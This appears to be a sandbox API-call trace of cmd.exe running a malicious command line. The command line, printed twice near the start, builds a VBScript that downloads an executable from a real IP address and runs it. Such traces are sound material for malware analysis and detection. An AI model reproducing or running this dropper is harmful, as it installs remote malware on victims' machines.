[0077.728] GetModuleHandleA (lpModuleName=0x0) returned 0x49de0000
[0077.728] __set_app_type (_Type=0x1)
[0077.729] __p__fmode () returned 0x75ab31f4
[0077.729] __p__commode () returned 0x75ab31fc
[0077.730] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e021a6) returned 0x0
[0077.730] __getmainargs (in: _Argc=0x49e04238, _Argv=0x49e04240, _Env=0x49e0423c, _DoWildCard=0, _StartInfo=0x49e04140 | out: _Argc=0x49e04238, _Argv=0x49e04240, _Env=0x49e0423c) returned 0
[0077.730] GetCurrentThreadId () returned 0x56c
[0077.730] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x56c) returned 0x60
[0077.730] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76220000
[0077.730] GetProcAddress (hModule=0x76220000, lpProcName="SetThreadUILanguage") returned 0x7624a84f
[0077.731] SetThreadUILanguage (LangId=0x0) returned 0x409
[0077.773] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0077.773] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fe5c | out: phkResult=0x22fe5c*=0x0) returned 0x2
[0077.773] VirtualQuery (in: lpAddress=0x22fe93, lpBuffer=0x22fe2c, dwLength=0x1c | out: lpBuffer=0x22fe2c*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0077.773] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fe2c, dwLength=0x1c | out: lpBuffer=0x22fe2c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
[0077.773] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fe2c, dwLength=0x1c | out: lpBuffer=0x22fe2c*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
[0077.773] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fe2c, dwLength=0x1c | out: lpBuffer=0x22fe2c*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0077.773] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fe2c, dwLength=0x1c | out: lpBuffer=0x22fe2c*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c
[0077.773] GetConsoleOutputCP () returned 0x1b5
[0077.773] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e04260 | out: lpCPInfo=0x49e04260) returned 1
[0077.773] SetConsoleCtrlHandler (HandlerRoutine=0x49dfe72a, Add=1) returned 1
[0077.773] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.773] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
[0077.774] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.774] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e041ac | out: lpMode=0x49e041ac) returned 1
[0077.774] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.774] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0077.774] _get_osfhandle (_FileHandle=0) returned 0x3
[0077.774] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e041b0 | out: lpMode=0x49e041b0) returned 1
[0077.775] _get_osfhandle (_FileHandle=0) returned 0x3
[0077.775] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
[0077.776] GetEnvironmentStringsW () returned 0x3a3928*
[0077.776] FreeEnvironmentStringsW (penv=0x3a3928) returned 1
[0077.776] GetEnvironmentStringsW () returned 0x3a3928*
[0077.776] FreeEnvironmentStringsW (penv=0x3a3928) returned 1
[0077.776] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22edcc | out: phkResult=0x22edcc*=0x68) returned 0x0
[0077.776] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22edd4, lpData=0x22edd8, lpcbData=0x22edd0*=0x1000 | out: lpType=0x22edd4*=0x0, lpData=0x22edd8*=0x0, lpcbData=0x22edd0*=0x1000) returned 0x2
[0077.776] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22edd4, lpData=0x22edd8, lpcbData=0x22edd0*=0x1000 | out: lpType=0x22edd4*=0x4, lpData=0x22edd8*=0x1, lpcbData=0x22edd0*=0x4) returned 0x0
[0077.776] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22edd4, lpData=0x22edd8, lpcbData=0x22edd0*=0x1000 | out: lpType=0x22edd4*=0x0, lpData=0x22edd8*=0x1, lpcbData=0x22edd0*=0x1000) returned 0x2
[0077.776] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22edd4, lpData=0x22edd8, lpcbData=0x22edd0*=0x1000 | out: lpType=0x22edd4*=0x4, lpData=0x22edd8*=0x0, lpcbData=0x22edd0*=0x4) returned 0x0
[0077.777] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22edd4, lpData=0x22edd8, lpcbData=0x22edd0*=0x1000 | out: lpType=0x22edd4*=0x4, lpData=0x22edd8*=0x40, lpcbData=0x22edd0*=0x4) returned 0x0
[0077.777] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22edd4, lpData=0x22edd8, lpcbData=0x22edd0*=0x1000 | out: lpType=0x22edd4*=0x4, lpData=0x22edd8*=0x40, lpcbData=0x22edd0*=0x4) returned 0x0
[0077.777] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22edd4, lpData=0x22edd8, lpcbData=0x22edd0*=0x1000 | out: lpType=0x22edd4*=0x0, lpData=0x22edd8*=0x40, lpcbData=0x22edd0*=0x1000) returned 0x2
[0077.777] RegCloseKey (hKey=0x68) returned 0x0
[0077.777] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22edcc | out: phkResult=0x22edcc*=0x68) returned 0x0
[0077.777] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22edd4, lpData=0x22edd8, lpcbData=0x22edd0*=0x1000 | out: lpType=0x22edd4*=0x0, lpData=0x22edd8*=0x40, lpcbData=0x22edd0*=0x1000) returned 0x2
[0077.777] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22edd4, lpData=0x22edd8, lpcbData=0x22edd0*=0x1000 | out: lpType=0x22edd4*=0x4, lpData=0x22edd8*=0x1, lpcbData=0x22edd0*=0x4) returned 0x0
[0077.777] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22edd4, lpData=0x22edd8, lpcbData=0x22edd0*=0x1000 | out: lpType=0x22edd4*=0x0, lpData=0x22edd8*=0x1, lpcbData=0x22edd0*=0x1000) returned 0x2
[0077.777] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22edd4, lpData=0x22edd8, lpcbData=0x22edd0*=0x1000 | out: lpType=0x22edd4*=0x4, lpData=0x22edd8*=0x0, lpcbData=0x22edd0*=0x4) returned 0x0
[0077.777] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22edd4, lpData=0x22edd8, lpcbData=0x22edd0*=0x1000 | out: lpType=0x22edd4*=0x4, lpData=0x22edd8*=0x9, lpcbData=0x22edd0*=0x4) returned 0x0
[0077.777] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22edd4, lpData=0x22edd8, lpcbData=0x22edd0*=0x1000 | out: lpType=0x22edd4*=0x4, lpData=0x22edd8*=0x9, lpcbData=0x22edd0*=0x4) returned 0x0
[0077.777] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22edd4, lpData=0x22edd8, lpcbData=0x22edd0*=0x1000 | out: lpType=0x22edd4*=0x0, lpData=0x22edd8*=0x9, lpcbData=0x22edd0*=0x1000) returned 0x2
[0077.777] RegCloseKey (hKey=0x68) returned 0x0
[0077.777] time (in: timer=0x0 | out: timer=0x0) returned 0x5bfd1040
[0077.777] srand (_Seed=0x5bfd1040)
[0077.777] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c CD %temp% & @echo set H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c = createobject(\"wscript.shell\") >ZMXZAA.vBS & @echo Dim X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x >>ZMXZAA.vBS & @echo Dim R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w >>ZMXZAA.vBS & @echo Dim B8yU2nW4oD3lW4vO1xP2nY9oR3e >>ZMXZAA.vBS & @echo Dim N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i >>ZMXZAA.vBS & @echo X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x = \"http://82.118.242.107/~able/1_ga/al/al.exe\" >>ZMXZAA.vBS & @echo R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w = \"JSTCHV.eXe\" >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = CreateObject(\"MSXML2.XMLHTTP\") >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.Open \"GET\", X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x, False >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.send (\"\") >>ZMXZAA.vBS & @echo If B8yU2nW4oD3lW4vO1xP2nY9oR3e.Status = 200 Then >>ZMXZAA.vBS & @echo Set N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i = CreateObject(\"ADODB.Stream\") >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Open >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Type = 1 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Write B8yU2nW4oD3lW4vO1xP2nY9oR3e.ResponseBody >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Position = 0 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.SaveToFile R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w, 2 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Close >>ZMXZAA.vBS & @echo Set nE= Nothing >>ZMXZAA.vBS & @echo End If >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = Nothing >>ZMXZAA.vBS & @echo WScript.Sleep(5000) >>ZMXZAA.VBs& @echo H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c.run(R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w) >>ZMXZAA.vBS & sTaRt ZMXZAA.vbs "
[0077.777] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c CD %temp% & @echo set H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c = createobject(\"wscript.shell\") >ZMXZAA.vBS & @echo Dim X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x >>ZMXZAA.vBS & @echo Dim R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w >>ZMXZAA.vBS & @echo Dim B8yU2nW4oD3lW4vO1xP2nY9oR3e >>ZMXZAA.vBS & @echo Dim N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i >>ZMXZAA.vBS & @echo X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x = \"http://82.118.242.107/~able/1_ga/al/al.exe\" >>ZMXZAA.vBS & @echo R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w = \"JSTCHV.eXe\" >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = CreateObject(\"MSXML2.XMLHTTP\") >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.Open \"GET\", X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x, False >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.send (\"\") >>ZMXZAA.vBS & @echo If B8yU2nW4oD3lW4vO1xP2nY9oR3e.Status = 200 Then >>ZMXZAA.vBS & @echo Set N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i = CreateObject(\"ADODB.Stream\") >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Open >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Type = 1 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Write B8yU2nW4oD3lW4vO1xP2nY9oR3e.ResponseBody >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Position = 0 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.SaveToFile R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w, 2 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Close >>ZMXZAA.vBS & @echo Set nE= Nothing >>ZMXZAA.vBS & @echo End If >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = Nothing >>ZMXZAA.vBS & @echo WScript.Sleep(5000) >>ZMXZAA.VBs& @echo H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c.run(R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w) >>ZMXZAA.vBS & sTaRt ZMXZAA.vbs "
[0077.778] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e05260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0077.778] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a5bc8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b
[0077.779] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0xbf
[0077.779] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
[0077.779] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e10640, nSize=0x2000 | out: lpBuffer="") returned 0x0
[0077.779] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
[0077.779] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
[0077.779] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
[0077.779] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
[0077.779] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
[0077.779] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
[0077.779] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
[0077.779] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
[0077.779] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
[0077.780] GetEnvironmentStringsW () returned 0x3a3928*
[0077.780] FreeEnvironmentStringsW (penv=0x3a3928) returned 1
[0077.780] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0077.780] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e10640, nSize=0x2000 | out: lpBuffer="") returned 0x0
[0077.780] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
[0077.780] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
[0077.780] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
[0077.780] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
[0077.780] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
[0077.780] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
[0077.780] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
[0077.780] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
[0077.780] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22fb98 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0077.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x22fb98, lpFilePart=0x22fb94 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x22fb94*="system32") returned 0x13
[0077.780] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10
[0077.780] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x22f914 | out: lpFindFileData=0x22f914) returned 0x3a7518
[0077.780] FindClose (in: hFindFile=0x3a7518 | out: hFindFile=0x3a7518) returned 1
[0077.781] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x22f914 | out: lpFindFileData=0x22f914) returned 0x3a7518
[0077.781] FindClose (in: hFindFile=0x3a7518 | out: hFindFile=0x3a7518) returned 1
[0077.781] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10
[0077.781] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1
[0077.781] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1
[0077.781] GetEnvironmentStringsW () returned 0x3a5dd8*
[0077.781] FreeEnvironmentStringsW (penv=0x3a5dd8) returned 1
[0077.781] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e05260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0077.782] GetConsoleOutputCP () returned 0x1b5
[0077.782] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e04260 | out: lpCPInfo=0x49e04260) returned 1
[0077.782] GetUserDefaultLCID () returned 0x409
[0077.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e04950, cchData=8 | out: lpLCData=":") returned 2
[0077.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fcd8, cchData=128 | out: lpLCData="0") returned 2
[0077.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fcd8, cchData=128 | out: lpLCData="0") returned 2
[0077.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fcd8, cchData=128 | out: lpLCData="1") returned 2
[0077.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e04940, cchData=8 | out: lpLCData="/") returned 2
[0077.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e04d80, cchData=32 | out: lpLCData="Mon") returned 4
[0077.783] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e04d40, cchData=32 | out: lpLCData="Tue") returned 4
[0077.783] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e04d00, cchData=32 | out: lpLCData="Wed") returned 4
[0077.783] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e04cc0, cchData=32 | out: lpLCData="Thu") returned 4
[0077.783] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e04c80, cchData=32 | out: lpLCData="Fri") returned 4
[0077.783] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e04c40, cchData=32 | out: lpLCData="Sat") returned 4
[0077.783] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e04c00, cchData=32 | out: lpLCData="Sun") returned 4
[0077.783] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e04930, cchData=8 | out: lpLCData=".") returned 2
[0077.783] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e04920, cchData=8 | out: lpLCData=",") returned 2
[0077.783] setlocale (category=0, locale=".OCP") returned="English_United States.437"
[0077.784] GetConsoleTitleW (in: lpConsoleTitle=0x3ad848, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.784] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76220000
[0077.784] GetProcAddress (hModule=0x76220000, lpProcName="CopyFileExW") returned 0x76253b92
[0077.784] GetProcAddress (hModule=0x76220000, lpProcName="IsDebuggerPresent") returned 0x76234a5d
[0077.784] GetProcAddress (hModule=0x76220000, lpProcName="SetConsoleInputExeNameW") returned 0x7624a79d
[0077.785] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x49e10640, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
[0077.785] _wcsicmp (_String1="CD", _String2=")") returned 58
[0077.786] _wcsicmp (_String1="FOR", _String2="CD") returned 3
[0077.786] _wcsicmp (_String1="FOR/?", _String2="CD") returned 3
[0077.786] _wcsicmp (_String1="IF", _String2="CD") returned 6
[0077.786] _wcsicmp (_String1="IF/?", _String2="CD") returned 6
[0077.786] _wcsicmp (_String1="REM", _String2="CD") returned 15
[0077.786] _wcsicmp (_String1="REM/?", _String2="CD") returned 15
[0077.787] _wcsicmp (_String1="echo", _String2=")") returned 60
[0077.787] _wcsicmp (_String1="FOR", _String2="echo") returned 1
[0077.787] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1
[0077.787] _wcsicmp (_String1="IF", _String2="echo") returned 4
[0077.787] _wcsicmp (_String1="IF/?", _String2="echo") returned 4
[0077.787] _wcsicmp (_String1="REM", _String2="echo") returned 13
[0077.787] _wcsicmp (_String1="REM/?", _String2="echo") returned 13
[0077.791] _wcsicmp (_String1="echo", _String2=")") returned 60
[0077.791] _wcsicmp (_String1="FOR", _String2="echo") returned 1
[0077.791] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1
[0077.791] _wcsicmp (_String1="IF", _String2="echo") returned 4
[0077.791] _wcsicmp (_String1="IF/?", _String2="echo") returned 4
[0077.791] _wcsicmp (_String1="REM", _String2="echo") returned 13
[0077.791] _wcsicmp (_String1="REM/?", _String2="echo") returned 13
[0077.794] _wcsicmp (_String1="echo", _String2=")") returned 60
[0077.794] _wcsicmp (_String1="FOR", _String2="echo") returned 1
[0077.794] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1
[0077.795] _wcsicmp (_String1="IF", _String2="echo") returned 4
[0077.795] _wcsicmp (_String1="IF/?", _String2="echo") returned 4
[0077.795] _wcsicmp (_String1="REM", _String2="echo") returned 13
[0077.795] _wcsicmp (_String1="REM/?", _String2="echo") returned 13
[0077.815] GetConsoleTitleW (in: lpConsoleTitle=0x22f96c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.815] _wcsicmp (_String1="CD", _String2="DIR") returned -1
[0077.815] _wcsicmp (_String1="CD", _String2="ERASE") returned -2
[0077.815] _wcsicmp (_String1="CD", _String2="DEL") returned -1
[0077.815] _wcsicmp (_String1="CD", _String2="TYPE") returned -17
[0077.815] _wcsicmp (_String1="CD", _String2="COPY") returned -11
[0077.815] _wcsicmp (_String1="CD", _String2="CD") returned 0
[0077.817] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0077.817] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0077.817] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f728, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f720, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f720*=0x705ba84c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
[0077.818] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f4cc | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0077.818] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x22f4cc, lpFilePart=0x22f4c8 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp", lpFilePart=0x22f4c8*="Temp") returned 0x24
[0077.818] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp")) returned 0x2010
[0077.818] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f248 | out: lpFindFileData=0x22f248) returned 0x3ac408
[0077.818] FindClose (in: hFindFile=0x3ac408 | out: hFindFile=0x3ac408) returned 1
[0077.818] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x22f248 | out: lpFindFileData=0x22f248) returned 0x3ac408
[0077.818] FindClose (in: hFindFile=0x3ac408 | out: hFindFile=0x3ac408) returned 1
[0077.818] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData", lpFindFileData=0x22f248 | out: lpFindFileData=0x22f248) returned 0x3ac408
[0077.818] FindClose (in: hFindFile=0x3ac408 | out: hFindFile=0x3ac408) returned 1
[0077.818] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local", lpFindFileData=0x22f248 | out: lpFindFileData=0x22f248) returned 0x3ac408
[0077.818] FindClose (in: hFindFile=0x3ac408 | out: hFindFile=0x3ac408) returned 1
[0077.818] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp", lpFindFileData=0x22f248 | out: lpFindFileData=0x22f248) returned 0x3ac408
[0077.818] FindClose (in: hFindFile=0x3ac408 | out: hFindFile=0x3ac408) returned 1
[0077.819] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp")) returned 0x2010
[0077.819] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp")) returned 1
[0077.819] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 1
[0077.819] GetEnvironmentStringsW () returned 0x3ae650*
[0077.819] FreeEnvironmentStringsW (penv=0x3ae650) returned 1
[0077.819] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e05260 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
[0077.819] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.819] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.819] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.819] GetFileType (hFile=0x7) returned 0x2
[0077.819] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
